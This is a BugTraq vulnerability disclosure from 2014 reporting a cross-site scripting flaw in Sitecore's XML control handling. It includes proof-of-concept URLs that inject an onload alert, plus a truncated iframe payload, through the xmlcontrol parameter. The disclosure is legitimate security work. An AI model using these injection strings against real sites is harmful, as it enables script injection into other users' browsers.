BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
SiteCore XML Control Script Insertion Jan 29 2014 07:10AM
Mark Litchfield (mark securatary com)
Hey All,

Sitecores ?special way? of displaying XML Controls directly allows for a
Cross Site Scripting Attack ? more can be achieved with these XML
Controls and will be documented in another vulnerability report

http://target/?xmlcontrol=body%20onload=alert(123)
http://target/?xmlcontrol=iframe%...

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus